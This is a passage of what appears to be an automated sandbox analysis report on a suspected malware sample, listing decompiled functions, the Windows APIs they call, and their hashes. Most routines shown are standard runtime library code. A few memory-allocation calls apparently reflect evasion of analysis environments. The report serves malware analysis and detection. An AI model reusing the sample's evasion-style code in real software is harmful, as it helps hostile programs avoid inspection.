                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: be67250477eae736abe2303578613184dbf746531a485a7a1d05613d1ac38b3e
                                          • Instruction ID: 37ec3d7db280b6fc96f7bec88a96dbb7190b50ed7f24c646539a0741a330c112
                                          • Opcode Fuzzy Hash: be67250477eae736abe2303578613184dbf746531a485a7a1d05613d1ac38b3e
                                          • Instruction Fuzzy Hash: 1E016172604317ABD7358F6CC88099AFBD8EF453B0F010629E565B75C0D7705810C7B0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119C3A2 Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 564 119c3a2-119c3d6 call 11977eb call 1197883 569 119c3d8-119c3db 564->569 570 119c3dd-119c3f2 call 119c410 564->570 571 119c3fc-119c400 569->571 573 119c3f7-119c3fa 570->573 574 119c40b-119c40f 571->574 575 119c402-119c40a call 11963fe 571->575 573->571 575->574
                                          C-Code - Quality: 91%
                                          			E0119C3A2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t22;
				void* _t25;
				signed int _t28;
				signed int _t29;

				_t25 = __ecx;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(E01197883(_t25, _a12,  &_v28, E011977EB(__edx, __eflags)) == 0) {
					_push(_a28);
					_t22 = E0119C410(_t25, __eflags, _a4, _a8, _v20, _a16, _a20, _a24); // executed
					_t29 = _t22;
				} else {
					_t29 = _t28 | 0xffffffff;
				}
				if(_v8 != 0) {
					E011963FE(_v20);
				}
				return _t29;
			}













                                          0x0119c3a2
                                          0x0119c3ad
                                          0x0119c3b0
                                          0x0119c3b3
                                          0x0119c3b6
                                          0x0119c3b9
                                          0x0119c3bc
                                          0x0119c3d6
                                          0x0119c3dd
                                          0x0119c3f2
                                          0x0119c3fa
                                          0x0119c3d8
                                          0x0119c3d8
                                          0x0119c3d8
                                          0x0119c400
                                          0x0119c405
                                          0x0119c40a
                                          0x0119c40f

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: b52257b47b282ee0d44ae77879093f2a10f19438a4253c275f0d4510689ed024
                                          • Instruction ID: 836f39d77ec8cf8da1f42aa78bbcdeb452eb8f11d125b44eb74618c12be6976d
                                          • Opcode Fuzzy Hash: b52257b47b282ee0d44ae77879093f2a10f19438a4253c275f0d4510689ed024
                                          • Instruction Fuzzy Hash: 5D014F72D0415ABFDF05AFA89C00AEE7FB5AF18214F144565E964E21A1E7318A20DBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009F0838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 009F07DA: GetSystemInfo.KERNELBASE(?), ref: 009F07F7
                                          • VirtualAllocExNuma.KERNELBASE(00000000), ref: 009F089D
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255511525.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_9f0000_dlcmto.jbxd
                                          Similarity
                                          • API ID: AllocInfoNumaSystemVirtual
                                          • String ID:
                                          • API String ID: 449148690-0
                                          • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                          • Instruction ID: 32011a40ea92fe595002ebc5dbf829b0f2533df9989762bc6e26d21fb3166f19
                                          • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                          • Instruction Fuzzy Hash: 96F0F970E4530CBAEB107BF08D0BB7DB66CAFC0341F1449A5BB54A6183DEB95600CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011971A3 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011971A3(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x11a9454, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E01193CC4();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E01196E3F(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E011966C1(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}







                                          0x011971a9
                                          0x011971ae
                                          0x011971bc
                                          0x011971bc
                                          0x011971c2
                                          0x011971c4
                                          0x011971c4
                                          0x011971db
                                          0x011971e4
                                          0x011971ec
                                          0x00000000
                                          0x00000000
                                          0x011971cc
                                          0x011971ce
                                          0x011971f0
                                          0x011971f5
                                          0x011971fb
                                          0x00000000
                                          0x011971fb
                                          0x011971d7
                                          0x011971d9
                                          0x00000000
                                          0x00000000
                                          0x011971d9
                                          0x00000000
                                          0x011971db
                                          0x011971b4
                                          0x011971ba
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01195671,00000001,00000364,00000007,000000FF,?,01198694,?,00000004,00000000,?,?), ref: 011971E4
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: c73343086335bbc8fb122dbfc1d7f5febe4db3652e29a1302484d434d730e228
                                          • Instruction ID: edc7f71b7892a0f323757bd28a7e50b3064496229e34b2728d64e7ef44bcfcfe
                                          • Opcode Fuzzy Hash: c73343086335bbc8fb122dbfc1d7f5febe4db3652e29a1302484d434d730e228
                                          • Instruction Fuzzy Hash: 40F0BE71A6052567AF2D6A6A9C00B6A7F4AEF516A0B094031ED34AA1D4DF20E8408EE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119CD07 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E0119CD07(void* __eflags, intOrPtr* _a4) {
				intOrPtr _t11;
				intOrPtr _t15;
				intOrPtr* _t24;

				 *0x11a9694 =  *0x11a9694 + 1;
				_t24 = _a4;
				_t11 = E01197200(0x1000); // executed
				 *((intOrPtr*)(_t24 + 4)) = _t11;
				E011963FE(0);
				if( *((intOrPtr*)(_t24 + 4)) == 0) {
					asm("lock or [eax], ecx");
					_t5 = _t24 + 0x14; // 0x119c63e
					 *((intOrPtr*)(_t24 + 4)) = _t5;
					0x1000 = 2;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
				}
				 *((intOrPtr*)(_t24 + 0x18)) = 0x1000;
				_t8 = _t24 + 4; // 0x8524c483
				_t15 =  *_t8;
				 *(_t24 + 8) =  *(_t24 + 8) & 0x00000000;
				 *_t24 = _t15;
				return _t15;
			}






                                          0x0119cd0c
                                          0x0119cd13
                                          0x0119cd1d
                                          0x0119cd24
                                          0x0119cd27
                                          0x0119cd35
                                          0x0119cd44
                                          0x0119cd47
                                          0x0119cd4c
                                          0x0119cd4f
                                          0x0119cd37
                                          0x0119cd37
                                          0x0119cd3a
                                          0x0119cd3a
                                          0x0119cd50
                                          0x0119cd53
                                          0x0119cd53
                                          0x0119cd56
                                          0x0119cd5b
                                          0x0119cd5f

                                          APIs
                                            • Part of subcall function 01197200: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0119BDD0,?,00000000,?,01198694,?,00000004,00000000,?,?,?,011934C6), ref: 01197232
                                          • _free.LIBCMT ref: 0119CD27
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: Heap$AllocateErrorFreeLast_free
                                          • String ID:
                                          • API String ID: 314386986-0
                                          • Opcode ID: fc02889fbb780654bce25fa7870084c49e660b28e9eaa7cf4d949732a70fa32d
                                          • Instruction ID: 3bb32774b38641251bfde887c1fd486ba4279067b4e33c70350c6051087ad5cd
                                          • Opcode Fuzzy Hash: fc02889fbb780654bce25fa7870084c49e660b28e9eaa7cf4d949732a70fa32d
                                          • Instruction Fuzzy Hash: ABF04F721057049FE7299F45D801B56F7E8EF50715F10842FD2AA875A0D7B4A4458BD4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01197200 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01197200(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E01196E3F(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x11a9454, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E01193CC4();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E011966C1(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}





                                          0x01197206
                                          0x0119720c
                                          0x0119723e
                                          0x01197243
                                          0x01197249
                                          0x00000000
                                          0x01197249
                                          0x01197210
                                          0x01197212
                                          0x01197212
                                          0x01197229
                                          0x01197232
                                          0x0119723a
                                          0x00000000
                                          0x00000000
                                          0x0119721a
                                          0x0119721c
                                          0x00000000
                                          0x00000000
                                          0x01197225
                                          0x01197227
                                          0x00000000
                                          0x00000000
                                          0x01197227
                                          0x00000000

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,0119BDD0,?,00000000,?,01198694,?,00000004,00000000,?,?,?,011934C6), ref: 01197232
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: f1f38fa33548299fa745599ea94823d05a8a81e37954accfa036cafd92111cda
                                          • Instruction ID: 589dea01890966f9f0bd3c826f35da785d5e747ac240b61c5b10a0f98c31ec36
                                          • Opcode Fuzzy Hash: f1f38fa33548299fa745599ea94823d05a8a81e37954accfa036cafd92111cda
                                          • Instruction Fuzzy Hash: 75E02B3193412666EF3D2679AC00B5B7E49AF01EB0F1500A0FD309A0C0DF20D840CBF1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119C7FB Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0119C7FB(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




                                          0x0119c818
                                          0x0119c81f

                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,00000000,?,0119C4B9,?,?,00000000,?,0119C4B9,00000000,0000000C), ref: 0119C818
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 79a0b8ac806993f208fe4b8de128d21766301a3f7287724c127b8933c5be1cde
                                          • Instruction ID: 32f0eb47c00a5cca175507388c2b7f608f99267143c10262094e26dec636cd2f
                                          • Opcode Fuzzy Hash: 79a0b8ac806993f208fe4b8de128d21766301a3f7287724c127b8933c5be1cde
                                          • Instruction Fuzzy Hash: E8D06C3200010DBBDF128E84DC06EDA3FAAFB48718F018010BA1856121C732E862AB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009F073A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 009F0777
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255511525.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_9f0000_dlcmto.jbxd
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
                                          • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                          • Instruction ID: 14a4c43ae221a087ba2e54cae82e5269d91ef51e091833a4c589bd44d0fcfeb5
                                          • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                          • Instruction Fuzzy Hash: 22110670D0021CAFDB00EFA8CD49BBEBBF8EB44314F208495EA15B7292D6755A44DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 01197D84 Relevance: 9.2, APIs: 6, Instructions: 193COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E01197D84(void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				intOrPtr* _v608;
				union _FINDEX_INFO_LEVELS _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				signed int _v624;
				union _FINDEX_INFO_LEVELS _v628;
				union _FINDEX_INFO_LEVELS _v632;
				signed int _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				signed int _v660;
				union _FINDEX_INFO_LEVELS _v664;
				union _FINDEX_INFO_LEVELS _v668;
				void* __ebx;
				void* __edi;
				signed int _t53;
				char _t55;
				signed char _t56;
				signed int _t62;
				signed int _t72;
				signed int _t75;
				union _FINDEX_INFO_LEVELS _t76;
				union _FINDEX_INFO_LEVELS _t78;
				intOrPtr* _t84;
				signed int _t87;
				intOrPtr _t94;
				union _FINDEX_INFO_LEVELS _t96;
				intOrPtr* _t97;
				signed int _t102;
				signed int _t108;
				intOrPtr _t112;
				void* _t113;
				void* _t114;
				signed int _t115;
				void* _t116;
				void* _t117;

				_t113 = __esi;
				_t53 =  *0x11a7210; // 0x1c85f4c4
				_v8 = _t53 ^ _t115;
				_t97 = _a8;
				_t111 = _a12;
				_t112 = _a4;
				_v608 = _t111;
				if(_t97 == _t112) {
					L6:
					_t55 =  *_t97;
					_v601 = _t55;
					if(_t55 != 0x3a) {
						L10:
						_t96 = 0;
						__eflags = _t55 - 0x2f;
						if(__eflags == 0) {
							L13:
							_t56 = 1;
							L14:
							_v668 = _t96;
							_v664 = _t96;
							_push(_t113);
							asm("sbb eax, eax");
							_v660 = _t96;
							_v656 = _t96;
							_v636 =  ~(_t56 & 0x000000ff) & _t97 - _t112 + 0x00000001;
							_v652 = _t96;
							_v648 = _t96;
							_t62 = E01197883(_t97 - _t112 + 1, _t112,  &_v668, E011977EB(_t111, __eflags));
							_t117 = _t116 + 0xc;
							asm("sbb eax, eax");
							_t114 = FindFirstFileExW( !( ~_t62) & _v660, _t96,  &_v600, _t96, _t96, _t96);
							__eflags = _t114 - 0xffffffff;
							if(_t114 != 0xffffffff) {
								_t102 =  *((intOrPtr*)(_v608 + 4)) -  *_v608;
								__eflags = _t102;
								_t103 = _t102 >> 2;
								_v640 = _t102 >> 2;
								do {
									_v632 = _t96;
									_v628 = _t96;
									_v624 = _t96;
									_v620 = _t96;
									_v616 = _t96;
									_v612 = _t96;
									_t72 = E01197B7D( &(_v600.cFileName),  &_v632,  &_v601, E011977EB(_t111, __eflags));
									_t117 = _t117 + 0x10;
									asm("sbb eax, eax");
									_t75 =  !( ~_t72) & _v624;
									__eflags =  *_t75 - 0x2e;
									if( *_t75 != 0x2e) {
										L21:
										_push(_v608);
										_t76 = E01197CD3(_t103, _t114, _t75, _t112, _v636);
										_t117 = _t117 + 0x10;
										_v644 = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											__eflags = _v612 - _t96;
											if(_v612 != _t96) {
												E011963FE(_v624);
												_t76 = _v644;
											}
											_t96 = _t76;
											L30:
											FindClose(_t114);
											L31:
											__eflags = _v648;
											_pop(_t113);
											if(_v648 != 0) {
												E011963FE(_v660);
											}
											_t78 = _t96;
											L34:
											return E01191F25(_t78, _t96, _v8 ^ _t115, _t111, _t112, _t113);
										}
										goto L22;
									}
									_t103 =  *((intOrPtr*)(_t75 + 1));
									__eflags = _t103;
									if(_t103 == 0) {
										goto L22;
									}
									__eflags = _t103 - 0x2e;
									if(_t103 != 0x2e) {
										goto L21;
									}
									__eflags =  *((intOrPtr*)(_t75 + 2)) - _t96;
									if( *((intOrPtr*)(_t75 + 2)) == _t96) {
										goto L22;
									}
									goto L21;
									L22:
									__eflags = _v612 - _t96;
									if(_v612 != _t96) {
										E011963FE(_v624);
										_pop(_t103);
									}
									__eflags = FindNextFileW(_t114,  &_v600);
								} while (__eflags != 0);
								_t84 = _v608;
								_t108 = _v640;
								_t111 =  *_t84;
								_t87 =  *((intOrPtr*)(_t84 + 4)) -  *_t84 >> 2;
								__eflags = _t108 - _t87;
								if(_t108 != _t87) {
									E0119B630(_t111, _t111 + _t108 * 4, _t87 - _t108, 4, E01197FDB);
								}
								goto L30;
							}
							_push(_v608);
							_t96 = E01197CD3( &_v600, _t114, _t112, _t96, _t96);
							goto L31;
						}
						__eflags = _t55 - 0x5c;
						if(__eflags == 0) {
							goto L13;
						}
						__eflags = _t55 - 0x3a;
						_t56 = 0;
						if(__eflags != 0) {
							goto L14;
						}
						goto L13;
					}
					if(_t97 == _t112 + 1) {
						_t55 = _v601;
						goto L10;
					}
					_push(_t111);
					_t96 = 0;
					_t78 = E01197CD3(_t97, _t113, _t112, 0, 0);
					goto L34;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t94 =  *_t97;
					if(_t94 == 0x2f || _t94 == 0x5c || _t94 == 0x3a) {
						break;
					}
					_t97 = E0119BBC0(_t112, _t97);
					if(_t97 != _t112) {
						continue;
					}
					break;
				}
				_t111 = _v608;
				goto L6;
			}













































                                          0x01197d84
                                          0x01197d8f
                                          0x01197d96
                                          0x01197d99
                                          0x01197d9c
                                          0x01197da1
                                          0x01197da4
                                          0x01197dac
                                          0x01197dd1
                                          0x01197dd1
                                          0x01197dd3
                                          0x01197ddb
                                          0x01197dfd
                                          0x01197dfd
                                          0x01197dff
                                          0x01197e01
                                          0x01197e0d
                                          0x01197e0d
                                          0x01197e0f
                                          0x01197e15
                                          0x01197e1d
                                          0x01197e23
                                          0x01197e24
                                          0x01197e26
                                          0x01197e2e
                                          0x01197e34
                                          0x01197e3a
                                          0x01197e40
                                          0x01197e54
                                          0x01197e59
                                          0x01197e64
                                          0x01197e7a
                                          0x01197e7c
                                          0x01197e7f
                                          0x01197ea2
                                          0x01197ea2
                                          0x01197ea4
                                          0x01197ea7
                                          0x01197ead
                                          0x01197ead
                                          0x01197eb3
                                          0x01197eb9
                                          0x01197ebf
                                          0x01197ec5
                                          0x01197ecb
                                          0x01197eec
                                          0x01197ef1
                                          0x01197ef6
                                          0x01197efa
                                          0x01197f00
                                          0x01197f03
                                          0x01197f16
                                          0x01197f16
                                          0x01197f24
                                          0x01197f29
                                          0x01197f2c
                                          0x01197f32
                                          0x01197f34
                                          0x01197f92
                                          0x01197f98
                                          0x01197fa0
                                          0x01197fa5
                                          0x01197fab
                                          0x01197fac
                                          0x01197fae
                                          0x01197faf
                                          0x01197fb5
                                          0x01197fb5
                                          0x01197fbc
                                          0x01197fbd
                                          0x01197fc5
                                          0x01197fca
                                          0x01197fcb
                                          0x01197fcd
                                          0x01197fda
                                          0x01197fda
                                          0x00000000
                                          0x01197f34
                                          0x01197f05
                                          0x01197f08
                                          0x01197f0a
                                          0x00000000
                                          0x00000000
                                          0x01197f0c
                                          0x01197f0f
                                          0x00000000
                                          0x00000000
                                          0x01197f11
                                          0x01197f14
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197f36
                                          0x01197f36
                                          0x01197f3c
                                          0x01197f44
                                          0x01197f49
                                          0x01197f49
                                          0x01197f58
                                          0x01197f58
                                          0x01197f60
                                          0x01197f66
                                          0x01197f6c
                                          0x01197f73
                                          0x01197f76
                                          0x01197f78
                                          0x01197f88
                                          0x01197f8d
                                          0x00000000
                                          0x01197f78
                                          0x01197e81
                                          0x01197e92
                                          0x00000000
                                          0x01197e92
                                          0x01197e03
                                          0x01197e05
                                          0x00000000
                                          0x00000000
                                          0x01197e07
                                          0x01197e09
                                          0x01197e0b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197e0b
                                          0x01197de2
                                          0x01197df7
                                          0x00000000
                                          0x01197df7
                                          0x01197de4
                                          0x01197de5
                                          0x01197dea
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197dae
                                          0x01197dae
                                          0x01197dae
                                          0x01197db2
                                          0x00000000
                                          0x00000000
                                          0x01197dc5
                                          0x01197dc9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01197dc9
                                          0x01197dcb
                                          0x00000000

                                          APIs
                                          • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01197E74
                                          • _free.LIBCMT ref: 01197FC5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: FileFindFirst_free
                                          • String ID:
                                          • API String ID: 689657435-0
                                          • Opcode ID: a9516da29ce77edf512b34eca062a355a21c3e56de08c63518bd5033ebcb3a42
                                          • Instruction ID: ac738ddc05043a7de4f7f547b6bbfe29bf306f2da5dee0d74ac5a1891a670a98
                                          • Opcode Fuzzy Hash: a9516da29ce77edf512b34eca062a355a21c3e56de08c63518bd5033ebcb3a42
                                          • Instruction Fuzzy Hash: 3361C671D141199FDF299F28CC88AFEBBB9AF05204F5441D9E069A7290EB304E848F51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01197CD3 Relevance: 6.2, APIs: 4, Instructions: 199fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E01197CD3(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
